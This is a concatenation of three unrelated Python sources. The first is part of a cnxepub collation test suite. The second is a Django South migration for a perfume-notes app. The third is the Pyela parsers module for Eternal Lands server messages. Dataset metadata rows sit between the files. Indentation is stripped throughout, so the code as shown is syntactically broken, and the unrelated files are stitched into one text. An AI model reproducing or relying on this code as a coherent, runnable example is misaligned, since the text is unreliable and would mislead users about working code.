def check_desserts(self, desserts):
"""Assertions for the desserts model"""
from ..models import model_to_tree
self.assertEqual('Desserts', desserts.metadata['title'])
self.assertEqual({
'shortId': None,
'id': '[email protected]',
'contents': [{
'shortId': 'frt',
'id': '[email protected]',
'contents': [{
'shortId': None,
'id': '[email protected]',
'title': 'Apple'
},
{
'shortId': None,
'id': '[email protected]',
'title': u'<span>1.1</span> <span>|</span> <span>レモン</span>'
},
{
'shortId': '[email protected]',
'id': '[email protected]',
'contents': [{
'shortId': None,
'id': '[email protected]',
'title': 'Lemon'
}
],
'title': '<span>Chapter</span> <span>2</span> <span>citrus</span>'
}
],
'title': 'Fruity'
},
{
'shortId': None,
'id': '[email protected]',
'title': u'チョコレート'
},
{
'shortId': None,
'id': '[email protected]',
'title': 'Extra Stuff'
}
],
'title': 'Desserts'}, model_to_tree(desserts))
base_metadata = {
u'publishers': [],
u'created': None, # '2016/03/04 17:05:20 -0500',
u'revised': None, # '2013/03/05 09:35:24 -0500',
u'authors': [
{u'type': u'cnx-id',
u'name': u'Good Food',
u'id': u'yum'}],
u'editors': [],
u'copyright_holders': [],
u'illustrators': [],
u'subjects': [u'Humanities'],
u'translators': [],
u'keywords': [u'Food', u'デザート', u'Pudding'],
u'title': u'チョコレート',
u'license_text': u'CC-By 4.0',
u'license_url': u'http://creativecommons.org/licenses/by/4.0/',
# 'version': 'draft',
u'language': 'en',
u'print_style': None,
u'cnx-archive-uri': None,
u'cnx-archive-shortid': None,
u'derived_from_title': None,
u'derived_from_uri': None,
u'version': None,
u'canonical_book_uuid': None,
u'slug': None,
}
fruity = desserts[0]
self.assertEqual('Binder', fruity.__class__.__name__)
self.assertEqual('Fruity', fruity.metadata['title'])
apple = fruity[0]
self.assertEqual('Document', apple.__class__.__name__)
metadata = base_metadata.copy()
metadata['title'] = 'Apple'
metadata['version'] = '1.3'
metadata['revised'] = '2013/03/05 09:35:24 -0500'
metadata['canonical_book_uuid'] = 'ea4244ce-dd9c-4166-9c97-acae5faf0ba1'
apple_metadata = apple.metadata.copy()
summary = etree.fromstring(apple_metadata.pop('summary'))
self.assertEqual('{http://www.w3.org/1999/xhtml}p', summary.tag)
self.assertEqual('summary', summary.text)
self.assertEqual(metadata, apple_metadata)
lemon = fruity[1]
self.assertEqual('Document', lemon.__class__.__name__)
metadata = base_metadata.copy()
metadata['title'] = 'Lemon'
metadata['version'] = '1.3'
metadata['revised'] = '2013/03/05 09:35:24 -0500'
apple_metadata = apple.metadata.copy()
lemon_metadata = lemon.metadata.copy()
summary = etree.fromstring(lemon_metadata.pop('summary'))
self.assertEqual('{http://www.w3.org/1999/xhtml}p', summary.tag)
self.assertEqual('summary', summary.text)
self.assertEqual(metadata, lemon_metadata)
citrus = fruity[2]
self.assertEqual('Binder', citrus.__class__.__name__)
self.assertEqual(citrus.metadata['title'], 'Citrus')
self.assertEqual(lemon.metadata, citrus[0].metadata)
chocolate = desserts[1]
self.assertEqual('Document', chocolate.__class__.__name__)
chocolate_metadata = chocolate.metadata.copy()
summary = etree.fromstring(chocolate_metadata.pop('summary'))
self.assertEqual('{http://www.w3.org/1999/xhtml}p', summary.tag)
self.assertEqual('summary', summary.text)
metadata = base_metadata.copy()
metadata['title'] = u'チョコレート'
metadata['version'] = '1.3'
metadata['revised'] = '2013/03/05 09:35:24 -0500'
apple_metadata = apple.metadata.copy()
self.assertEqual(metadata, chocolate_metadata)
extra = desserts[2]
self.assertEqual('CompositeDocument', extra.__class__.__name__)
extra_metadata = extra.metadata.copy()
summary = etree.fromstring(extra_metadata.pop('summary'))
self.assertEqual('{http://www.w3.org/1999/xhtml}p', summary.tag)
self.assertEqual('summary', summary.text)
metadata = base_metadata.copy()
metadata['title'] = 'Extra Stuff'
metadata['version'] = '1.3'
metadata['revised'] = '2013/03/05 09:35:24 -0500'
self.assertEqual(metadata, extra_metadata)
class CollateTestCase(BaseModelTestCase):
@property
def target(self):
from cnxepub.collation import collate
return collate
def test(self):
binder = self.make_binder(
'8d75ea29',
metadata={'version': '3', 'title': 'Book One',
'license_url': 'http://my.license',
'cnx-archive-uri': 'bad183c3-8776-4a6d-bb02-3b11e0c26aaf'},
nodes=[
self.make_document(
id="e78d4f90",
content=b"<body><p>document one</p></body>",
metadata={'version': '3',
'title': "Document One",
'license_url': 'http://my.license'}),
self.make_document(
id="3c448dc6",
content=b"<body><p>document two</p></body>",
metadata={'version': '1',
'title': "Document Two",
'license_url': 'http://my.license'})])
# Append a ruleset to the binder.
ruleset = io.BytesIO(b" ")
resource = self.make_resource('ruleset', ruleset, 'text/css',
filename='ruleset.css')
binder.resources.append(resource)
def mock_easybake(ruleset, in_html, out_html):
from lxml import etree
html = etree.parse(in_html)
# Add in a composite-page with title "Composite One" here.
body = html.getroot().xpath(
'//xhtml:body',
namespaces={'xhtml': 'http://www.w3.org/1999/xhtml'})[0]
comp_elm = etree.SubElement(body, 'div')
comp_elm.attrib['data-type'] = 'composite-page'
comp_elm.append(etree.fromstring("""
<div data-type="metadata">
<h1 data-type="document-title" itemprop="name">Composite One</h1>
<div class="authors">
By:
Edited by:
Illustrated by:
Translated by:
</div>
<div class="publishers">
Published By:
</div>
<div class="permissions">
<p class="license">
Licensed:
<a href="" itemprop="dc:license,lrmi:useRightsURL" data-type="license"/>
</p>
</div>
<div class="description" itemprop="description" data-type="description"> </div>
</div>"""))
etree.SubElement(comp_elm, 'p').text = "composite document"
# Add the composite-page to the table-of-contents.
toc = html.getroot().xpath(
"//xhtml:*[@id='toc']/xhtml:ol",
namespaces={'xhtml': 'http://www.w3.org/1999/xhtml'})[0]
etree.SubElement(toc, 'li').append(etree.fromstring('<a>Composite One</a>'))
out_html.write(etree.tostring(html))
with mock.patch('cnxepub.collation.easybake') as easybake:
easybake.side_effect = mock_easybake
fake_ruleset = 'div::after {contents: "test"}'
collated_binder = self.target(binder, fake_ruleset)
# Check for the appended composite document
self.assertEqual(len(collated_binder), 3)
self.assertEqual(collated_binder[2].id, 'a9428a6c-5d31-5425-8335-8a2e780651e0')
self.assertEqual(collated_binder[2].metadata['title'],
'Composite One')
def test_without_ruleset(self):
binder = self.make_binder(
'8d75ea29',
metadata={'version': '3', 'title': "Book One",
'license_url': 'http://my.license'},
nodes=[
self.make_document(
id="e78d4f90",
metadata={'version': '3',
'title': "Document One",
'license_url': 'http://my.license'}),
self.make_document(
id="3c448dc6",
metadata={'version': '1',
'title': "Document Two",
'license_url': 'http://my.license'})])
result = self.target(binder)
self.assertIs(binder, result)
def test_with_ruleset(self):
binder = self.make_binder(
'8d75ea29',
metadata={'version': '3', 'title': "Book One",
'license_url': 'http://my.license'},
nodes=[
self.make_document(
id="e78d4f90",
content=b"<body><span>document one</span></body>",
metadata={'version': '3',
'title': "Document One",
'license_url': 'http://my.license'}),
self.make_document(
id="3c448dc6",
content=b"<body><span>document two</span></body>",
metadata={'version': '1',
'title': "Document Two",
'license_url': 'http://my.license'})])
# Append a ruleset to the binder.
ruleset_bytes = b"""\
div[data-type='page'] > div[data-type='metadata'] {
copy-to: eob-all
}
div[data-type='page'] span {
copy-to: eob-all
}
body::after {
content: pending(eob-all);
class: end-of-book;
data-type: composite-page;
container: div;
}
/* copied from cte books/rulesets/common/toc.less */
body > div[data-type="page"],
body > div[data-type="composite-page"]:pass(20) {
string-set: page-id attr(id);
}
body > div[data-type="page"] > div[data-type="metadata"] > \
h1[data-type='document-title'],
body > div[data-type="composite-page"] > div[data-type="metadata"] > \
h1[data-type='document-title']:pass(20) {
copy-to: page-title;
}
body > div[data-type="page"]::after,
body > div[data-type="composite-page"]:pass(20)::after {
content: pending(page-title);
attr-href: "#" string(page-id);
container: a;
move-to: page-link;
}
body > div[data-type="page"]::after,
body > div[data-type="composite-page"]:pass(20)::after {
content: pending(page-link);
move-to: eob-toc;
container: li;
}
nav#toc:pass(30) {
content: '';
}
nav#toc:pass(30)::after {
content: pending(eob-toc);
container: ol;
}
"""
resource = self.make_resource('ruleset',
io.BytesIO(ruleset_bytes),
'text/css',
filename='ruleset.css')
binder.resources.append(resource)
collated_binder = self.target(binder, ruleset_bytes)
# Check for the appended composite document
self.assertEqual(len(collated_binder), 3)
self.assertEqual(collated_binder[2].metadata['title'],
'Document One')
| agpl-3.0 | 3,295,563,899,847,968,300 | 36.897222 | 93 | 0.509859 | false | 3.72048 | true | false | false |
brjadams/basenoter | basenotes/notes/migrations/0005_auto__del_splitclient__add_splittrans__del_field_parfumsizes_size_oz__.py | 1 | 13307 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'SplitClient'
db.delete_table(u'notes_splitclient')
# Adding model 'SplitTrans'
db.create_table(u'notes_splittrans', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('split', self.gf('django.db.models.fields.related.ForeignKey')(related_name='client', to=orm['notes.Split'])),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
))
db.send_create_signal(u'notes', ['SplitTrans'])
# Deleting field 'ParfumSizes.size_oz'
db.delete_column(u'notes_parfumsizes', 'size_oz')
# Adding field 'ParfumSizes.size_ml'
db.add_column(u'notes_parfumsizes', 'size_ml',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=4, decimal_places=2),
keep_default=False)
# Deleting field 'Split.min_ml'
db.delete_column(u'notes_split', 'min_ml')
# Deleting field 'Split.pp_ml'
db.delete_column(u'notes_split', 'pp_ml')
# Adding field 'Split.bottle_price'
db.add_column(u'notes_split', 'bottle_price',
self.gf('django.db.models.fields.related.ForeignKey')(default=1, related_name='decanted', to=orm['notes.ParfumSizes']),
keep_default=False)
# Adding field 'Split.splits'
db.add_column(u'notes_split', 'splits',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'Split.split_size'
db.add_column(u'notes_split', 'split_size',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=8, decimal_places=2),
keep_default=False)
def backwards(self, orm):
# Adding model 'SplitClient'
db.create_table(u'notes_splitclient', (
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('split', self.gf('django.db.models.fields.related.ForeignKey')(related_name='client', to=orm['notes.Split'])),
))
db.send_create_signal(u'notes', ['SplitClient'])
# Deleting model 'SplitTrans'
db.delete_table(u'notes_splittrans')
# Adding field 'ParfumSizes.size_oz'
db.add_column(u'notes_parfumsizes', 'size_oz',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=4, decimal_places=2),
keep_default=False)
# Deleting field 'ParfumSizes.size_ml'
db.delete_column(u'notes_parfumsizes', 'size_ml')
# Adding field 'Split.min_ml'
db.add_column(u'notes_split', 'min_ml',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'Split.pp_ml'
db.add_column(u'notes_split', 'pp_ml',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=8, decimal_places=2),
keep_default=False)
# Deleting field 'Split.bottle_price'
db.delete_column(u'notes_split', 'bottle_price_id')
# Deleting field 'Split.splits'
db.delete_column(u'notes_split', 'splits')
# Deleting field 'Split.split_size'
db.delete_column(u'notes_split', 'split_size')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'notes.classification': {
'Meta': {'object_name': 'Classification'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'notes.currency': {
'Meta': {'object_name': 'Currency'},
'country': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '10'})
},
u'notes.house': {
'Meta': {'object_name': 'House'},
'abbrev_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'bio_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'founded': ('django.db.models.fields.DateField', [], {}),
'founder': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'national_origin': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'notes.likeditem': {
'Meta': {'object_name': 'LikedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'liked_by': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {})
},
u'notes.note': {
'Meta': {'object_name': 'Note'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'notes': ('django.db.models.fields.TextField', [], {}),
'resource': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'notes.parfum': {
'Meta': {'object_name': 'Parfum'},
'classification': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['notes.Classification']", 'symmetrical': 'False'}),
'house': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'parfums'", 'to': u"orm['notes.House']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'notes_base': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'base_notes'", 'symmetrical': 'False', 'to': u"orm['notes.Note']"}),
'notes_heart': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'heart_notes'", 'symmetrical': 'False', 'to': u"orm['notes.Note']"}),
'notes_top': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'top_notes'", 'symmetrical': 'False', 'to': u"orm['notes.Note']"}),
'perfumer': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'parfums'", 'blank': 'True', 'to': u"orm['notes.Perfumer']"})
},
u'notes.parfumsizes': {
'Meta': {'object_name': 'ParfumSizes'},
'currency': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parfum': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'parfum_sizes'", 'symmetrical': 'False', 'to': u"orm['notes.Parfum']"}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '8', 'decimal_places': '2'}),
'size_ml': ('django.db.models.fields.DecimalField', [], {'max_digits': '4', 'decimal_places': '2'})
},
u'notes.perfumer': {
'Meta': {'object_name': 'Perfumer'},
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'notes.review': {
'Meta': {'object_name': 'Review'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'reviews'", 'to': u"orm['notes.Parfum']"}),
'review': ('django.db.models.fields.TextField', [], {}),
'reviewed_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'reviews'", 'to': u"orm['auth.User']"})
},
u'notes.split': {
'Meta': {'object_name': 'Split'},
'bottle': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'decanted'", 'to': u"orm['notes.Parfum']"}),
'bottle_price': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'decanted'", 'to': u"orm['notes.ParfumSizes']"}),
'host': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'host'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'split_size': ('django.db.models.fields.DecimalField', [], {'max_digits': '8', 'decimal_places': '2'}),
'splits': ('django.db.models.fields.PositiveIntegerField', [], {})
},
u'notes.splittrans': {
'Meta': {'object_name': 'SplitTrans'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'split': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'client'", 'to': u"orm['notes.Split']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
}
}
complete_apps = ['notes']
| gpl-3.0 | -2,967,022,694,690,005,500 | 60.893023 | 195 | 0.555723 | false | 3.596486 | false | false | false |
atc-/pyela | pyela/el/net/parsers.py | 1 | 13131 | # Copyright 2008 Alex Collins
#
# This file is part of Pyela.
#
# Pyela is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyela is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Pyela. If not, see <http://www.gnu.org/licenses/>.
"""Numerous objects for parsing the messages (raw bytes) from a server
into their relevant format for use with the rest of the API.
The MessageParser base class defines common functionality for using these
objects without prior knowledge of the instance at runtime.
"""
import logging
import struct
import time
from pyela.el.common.actors import ELActor
from pyela.el.util.strings import strip_chars, split_str, is_colour, el_colour_to_rgb, bytes_find, bytes_rfind
from pyela.el.net.packets import ELPacket
from pyela.el.net.elconstants import ELNetFromServer, ELNetToServer, ELConstants
from pyela.el.net.channel import Channel
from pyela.el.logic.eventmanagers import ELSimpleEventManager
from pyela.el.logic.events import ELEventType, ELEvent
log = logging.getLogger('pyela.el.net.parsers')
em = ELSimpleEventManager()
class MessageParser(object):
"""A message received from the Eternal Lands server"""
def __init__(self, connection):
"""The connection should be an instance of ELConnection"""
self.connection = connection
def parse(self, packet):
"""Parse the given packet and return a list of Event
instances (or derivatives) (if any)
"""
pass
class ELRawTextMessageParser(MessageParser):
"""Parses RAW_TEXT messages"""
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.RAW_TEXT))
event.data = {}
event.data['connection'] = self.connection #The connection the message origins from
event.data['channel'] = packet.data[0] # The channel of the message
event.data['text'] = strip_chars(packet.data[1:]) # The stripped text of the message, no colour codes, special characters translated to utf8
event.data['raw'] = packet.data[1:] # The raw text including colour codes and untranslated special characters
return [event]
class ELAddActorMessageParser(MessageParser):
def parse(self, packet):
"""Parse an ADD_NEW_(ENHANCED)_ACTOR message"""
if log.isEnabledFor(logging.DEBUG): log.debug("New actor: %s" % packet)
actor = ELActor()
actor.id, actor.x_pos, actor.y_pos, actor.z_pos, \
actor.z_rot, actor.type, frame, actor.max_health, \
actor.cur_health, actor.kind_of_actor \
= struct.unpack('<HHHHHBBHHB', packet.data[:17])
events = []
#Remove the buffs from the x/y coordinates
actor.x_pos = actor.x_pos & 0x7FF
actor.y_pos = actor.y_pos & 0x7FF
if packet.type == ELNetFromServer.ADD_NEW_ENHANCED_ACTOR:
actor.name = packet.data[28:]
frame = packet.data[22] #For some reason, data[11] is unused in the ENHANCED message
actor.kind_of_actor = packet.data[27]
else:
actor.name = packet.data[17:]
#The end of name is a \0, and there _might_ be two OR three more bytes
# containing actor-scale info.
name_end = bytes_find(actor.name, 0)
if name_end < len(actor.name)-2:
#There are two OR three more bytes after the name,
# the actor scaling bytes and possibly the attachment type
unpacked = struct.unpack('<H', actor.name[name_end+1:name_end+3])
actor.scale = unpacked[0]
#actor.scale = float(scale)/ELConstants.ACTOR_SCALE_BASE
if len(actor.name) > name_end+3:
pass
#TODO: The actor class has no attachment_type member (yet)
# The below code is tested and extracts the correct information
#actor.attachment_type = struct.unpack('B', actor.name[name_end+3])[0]
#if actor.attachment_type > 0 and actor.attachment_type < 255:
# ##ON A HORSE!!
#else:
# actor.attachment_type = 0 # The server sends either 255 or 0 if we're not on a horse
actor.name = actor.name[:name_end]
else:
actor.scale = 1
actor.name = actor.name[:-1]
#Find the actor's name's colour char
i = 0
while i < len(actor.name) and is_colour(actor.name[i]):
actor.name_colour = el_colour_to_rgb(actor.name[i])
i += 1
if actor.name_colour[0] == -1:
#We didn't find any colour codes, use kind_of_actor
if actor.kind_of_actor == ELConstants.NPC:
#NPC, bluish
#The official client colour is (0.3, 0.8, 1.0), but it's too green to see on the minimap
actor.name_colour = (0.0, 0.0, 1.0)
elif actor.kind_of_actor in (ELConstants.HUMAN, ELConstants.COMPUTER_CONTROLLED_HUMAN):
#Regular player, white
actor.name_colour = (1.0, 1.0, 1.0)
elif packet.type == ELNetFromServer.ADD_NEW_ENHANCED_ACTOR and actor.kind_of_actor in (ELConstants.PKABLE_HUMAN, ELConstants.PKABLE_COMPUTER_CONTROLLED):
#PKable player, red
actor.name_colour = (1.0, 0.0, 0.0)
else:
#Animal, yellow
actor.name_colour = (1.0, 1.0, 0.0)
space = bytes_rfind(actor.name, ord(' '))
if space != -1 and space > 0 and space+1 < len(actor.name) and is_colour(actor.name[space+1]):
actor.name = strip_chars(actor.name)
if log.isEnabledFor(logging.DEBUG): log.debug("Actor has a guild. Parsing from '%s'" % actor.name)
# split the name into playername and guild
tokens = actor.name.rsplit(' ', 1)
actor.name = tokens[0]
actor.guild = tokens[1]
else:
actor.name = strip_chars(actor.name)
#Deal with the current frame of the actor
if frame in (ELConstants.FRAME_DIE1, ELConstants.FRAME_DIE2):
actor.dead = True
elif frame in (ELConstants.FRAME_COMBAT_IDLE, ELConstants.FRAME_IN_COMBAT):
actor.fighting = True
elif frame >= ELConstants.FRAME_ATTACK_UP_1 and frame <= ELConstants.FRAME_ATTACK_UP_10:
actor.fighting = True
elif frame in (ELConstants.PAIN1, ELConstants.PAIN2):
actor.fighting = True
self.connection.session.actors[actor.id] = actor
event = ELEvent(ELEventType(ELNetFromServer.ADD_NEW_ACTOR))
event.data = actor #TODO: add connection to event data
events.append(event)
if actor.id == self.connection.session.own_actor_id:
self.connection.session.own_actor = actor
event = ELEvent(ELEventType(ELNetFromServer.YOU_ARE))
event.data = actor #TODO: add connection to event data
events.append(event)
if log.isEnabledFor(logging.DEBUG): log.debug("Actor parsed: %s, %s, %s, %s, %s, %s, %s, %s, %s, %s" % (actor.id, actor.x_pos, actor.y_pos, actor.z_pos, \
actor.z_rot, actor.type, actor.max_health, \
actor.cur_health, actor.kind_of_actor, actor.name))
return events
class ELRemoveActorMessageParser(MessageParser):
def _get_ids(data):
offset = 0
while offset < len(data):
yield struct.unpack_from('<H', data, offset)[0]
offset += 2
_get_ids = staticmethod(_get_ids)
def parse(self, packet):
"""Remove actor packet. Remove from self.connection.session.actors dict"""
if log.isEnabledFor(logging.DEBUG): log.debug("Remove actor packet: '%s'" % packet.data)
if log.isEnabledFor(logging.DEBUG): log.debug("Actors: %s" % self.connection.session.actors)
for actor_id in self._get_ids(packet.data):
event = ELEvent(ELEventType(ELNetFromServer.REMOVE_ACTOR))
event.data = {}
event.data['connection'] = self.connection
event.data['id'] = actor_id
event.data['actor'] = self.connection.session.actors[actor_id]
if actor_id in self.connection.session.actors:
del self.connection.session.actors[actor_id]
if actor_id == self.connection.session.own_actor_id:
self.connection.session.own_actor_id = -1
self.connection.session.own_actor = None
return [event]
class ELRemoveAllActorsParser(MessageParser):
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.KILL_ALL_ACTORS))
event.data = {'connection': self.connection} # The full actors list can be added to the event data if it's required
self.connection.session.actors = {}
if log.isEnabledFor(logging.DEBUG): log.debug("Remove all actors packet")
return [event]
class ELAddActorCommandParser(MessageParser):
def _get_commands(data):
offset = 0
while offset < len(data):
yield struct.unpack_from('<HB', data, offset)
offset += 3
_get_commands = staticmethod(_get_commands)
def parse(self, packet):
events = []
if log.isEnabledFor(logging.DEBUG): log.debug("Actor command packet: '%s'" % packet.data)
for actor_id, command in self._get_commands(packet.data):
if actor_id in self.connection.session.actors:
self.connection.session.actors[actor_id].handle_command(command)
event = ELEvent(ELEventType(ELNetFromServer.ADD_ACTOR_COMMAND))
event.data = {'actor': self.connection.session.actors[actor_id], 'command': command, 'connection': self.connection}
events.append(event)
else:
#The actor could not be found. Something strange has happened.
#Request a new list of nearby actors from the server (resync).
#TODO: Log?
self.connection.send(ELPacket(ELNetToServer.SEND_ME_MY_ACTORS, None))
return events
class ELYouAreParser(MessageParser):
def parse(self, packet):
if log.isEnabledFor(logging.DEBUG): log.debug("YouAre packet: '%s'" % packet.data)
id = struct.unpack('<H', packet.data)[0]
self.connection.session.own_actor_id = id
if id in self.connection.session.actors:
self.connection.session.own_actor = self.connection.session.actors[id]
event = ELEvent(ELEventType(ELNetFromServer.YOU_ARE))
event.data = self.connection.session.own_actor #TODO: Add connection to event.data
return[event]
return []
class ELGetActiveChannelsMessageParser(MessageParser):
"""parse the GET_ACTIVE_CHANNELS message"""
def parse(self, packet):
del self.connection.session.channels[:]
#Message structure: Active channel (1, 2 or 3), channel 1, channel 2, channel 3
chans = struct.unpack('<BIIII', packet.data)
i = 0
active = chans[0]
for c in chans[1:]:
if c != 0:
self.connection.session.channels.append(Channel(self.connection, c, i == active))
i += 1
#Event to notify about the change in the channel list
event = ELEvent(ELEventType(ELNetFromServer.GET_ACTIVE_CHANNELS))
event.data = {'connection': self.connection, 'channels': self.connection.session.channels}
return [event]
class ELBuddyEventMessageParser(MessageParser):
"""Parse the BUDDY_EVENT message"""
def parse(self, packet):
change = packet.data[0]# 1 is online, 0 offline
event = ELEvent(ELEventType(ELNetFromServer.BUDDY_EVENT))
event.data = {}
if change == 1:
#Buddy came online
buddy = str(strip_chars(packet.data[2:]))
self.connection.session.buddies.append(buddy)
event.data['event'] = 'online'
else:
#Buddy went offline
buddy = str(strip_chars(packet.data[1:]))
self.connection.session.buddies.remove(buddy)
event.data['event'] = 'offline'
event.data['name'] = buddy
event.data['connection'] = self.connection
return [event]
class ELLoginFailedParser(MessageParser):
"""Parse the LOG_IN_NOT_OK message"""
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.LOG_IN_NOT_OK))
event.data = {}
event.data['text'] = strip_chars(packet.data)
event.data['raw'] = packet.data
event.data['connection'] = self.connection
return [event]
class ELYouDontExistParser(MessageParser):
"""Parse the YOU_DONT_EXIST message"""
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.YOU_DONT_EXIST))
event.data = {}
event.data['connection'] = self.connection
return[event]
class ELLoginOKParser(MessageParser):
"""Parse the LOG_IN_OK message"""
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.LOG_IN_OK))
event.data = {}
event.data['connection'] = self.connection
self.connection.con_tries = 0
return [event]
class ELPingRequestParser(MessageParser):
"""Parse the PING_REQUEST message and respond with the appropriate message.
Does not raise an event, as this is strictly a protocol feature and not
something the application itself should worry about."""
def parse(self, packet):
# Send the message back as-is.
self.connection.send(ELPacket(ELNetToServer.PING_RESPONSE, packet.data))
return []
class ELNewMinuteParser(MessageParser):
def parse(self, packet):
if len(packet.data) != 2:
#TODO: Invalid message
return []
self.connection.session.game_time = struct.unpack('<H', packet.data)[0]
self.connection.session.game_time %= 360 #Clamp to six-hour time
event = ELEvent(ELEventType(ELNetFromServer.NEW_MINUTE))
event.data = {}
event.data['connection'] = self.connection
event.data['time'] = self.connection.session.game_time
